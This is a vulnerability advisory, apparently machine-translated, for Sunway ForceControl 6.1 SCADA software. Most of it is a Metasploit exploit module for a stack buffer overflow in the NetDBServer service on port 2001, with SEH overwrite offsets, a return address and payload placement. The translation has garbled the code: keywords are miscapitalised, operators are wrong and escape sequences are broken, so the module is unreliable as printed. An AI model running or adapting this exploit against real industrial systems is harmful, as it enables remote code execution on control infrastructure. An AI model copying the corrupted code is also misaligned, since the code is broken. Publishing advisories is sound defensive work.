Multiple security vulnerabilities in Sunway ForceControl

Release date:
Updated on:

Affected Systems:
Sunway ForceContro 6.1 SP3
Sunway ForceContro 6.1 SP2
Sunway ForceContro 6.1 SP1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49747

Sunway ForceControl is a Chinese SCADA/HMI software.

Multiple security vulnerabilities exist in ForceControl implementation. Remote attackers may exploit this vulnerability to execute arbitrary code on the target system and retrieve arbitrary files outside the root directory of the server, resulting in DOS.

<* Source: Luigi Auriemma (aluigi@pivx.com)

Link: http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt
*>

Test method:
--------------------------------------------------------------------------------
Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Luigi Auriemma (aluigi@pivx.com) provides the following testing methods:

##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##
Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking
Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Remote: Seh
Def initialize (info = {})
Super (update_info (info,
'Name' => 'sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 ',
'Description' => % q {
This module exploits a stack based buffer overflow found in the SNMP
NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is
Triggered when sending an overly long string to the listening service
On port 2001.
},
'Author' => [
'Luigi auriemm', # original discovery
'Rinat Ziyayev ',
'James fitts'
],
'License '=> MSF_LICENSE,
'References '=>
[
['Bid', '123'],
['Url', 'HTTP: // aluigi.altervista.org/adv/forcecontrol_1-adv.txt'],
],
'Defaultopexception' =>
{
'Deletec' => 'thread ',
},
'Privileged' => true,
'Payload' =>
{
'Disablenops '=> 'true ',
'Badchars' => "\ x0a \ x0d \ xae ",
},
'Platform' => 'win ',
'Targets' =>
[
[
# P/r ComDll. dll
'Windows', {'ret '=> 0x100022c4}
],
],
'Defaulttarget' => 0,
'Disclosuredate' => 'sep 22 2011 '))
Register_options (
[
Opt: RPORT (1, 2001)
], Self. class)
End
Def exploit
Connect
Header = "\ xeb \ x50 \ xeb \ x50"
Header <"\ x57 \ x00" # packet type
Header <"\ xff \ x00 \ x00"
Header <"\ x01 \ x00"
Header <"\ xff"
Footer = "\ r \ n"
Packet = rand_text_alpha_upper (65535)
Packet [0, header. length] = header
Packet [293,8] = generate_seh_record (target. ret)
Packet [301,20] = make_nops (20)
Packet [321, payload. encoded. length] = payload. encoded
Packet [65533,2] = footer
Print_status ("Trying target % s..." % target. name)
Sock. put (packet)
Handler
Disconnect
End
End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Sunway
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.sunwayland.com.cn/pro.asp